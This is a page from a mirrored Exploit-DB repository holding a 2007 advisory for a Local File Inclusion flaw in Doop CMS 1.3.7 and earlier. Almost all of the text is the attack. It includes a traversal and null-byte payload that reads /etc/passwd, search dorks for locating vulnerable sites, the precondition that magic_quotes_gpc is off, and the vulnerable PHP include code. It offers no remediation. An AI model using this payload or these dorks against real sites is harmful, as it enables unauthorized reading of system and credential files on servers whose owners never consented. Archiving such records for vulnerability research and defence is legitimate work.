bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4536.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

41 lines
No EOL
2.1 KiB
Text
Raw Blame History

______________________________________________________
| DOOP CMS <=1.3.7 Local File Inclusion |
|______________________________________________________|
______________________________________________________
| vuln path: ?page=/../../../../../../../etc/passwd%00 |
| |
| dork: Doop CMS |
| dork2: powered by Doop CMS |
| |
| work only if magic_quotes_gpc are set to OFF |
|______________________________________________________|
______________________________________________________
| vuln code: |
| line 544: |
| if (!isset($_REQUEST['page'])){ |
| $_REQUEST['page']=$homepage; |
| $cpage=$_REQUEST['page']; |
| } else { $cpage=$_REQUEST['page']; } |
| |
| line 646: |
| if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
| if (file_exists("pages/".$cpage.".htm")){ |
| include("pages/".$cpage.".htm"); |
| } |
| else include("pages/".$cpage.".html"); |
| } |
|______________________________________________________|
______________________________________________________
| greetz to: http://vladii.wordpress.com |
| http://rstzone.org |
| http://hackpedia.info |
| SlicK & Shocker & moubik & kw3 |
|______________________________________________________|
______________________________________________________
| @vladii 2007 |
|______________________________________________________|
# milw0rm.com [2007-10-15]
Reference in a new issue View git blame Copy permalink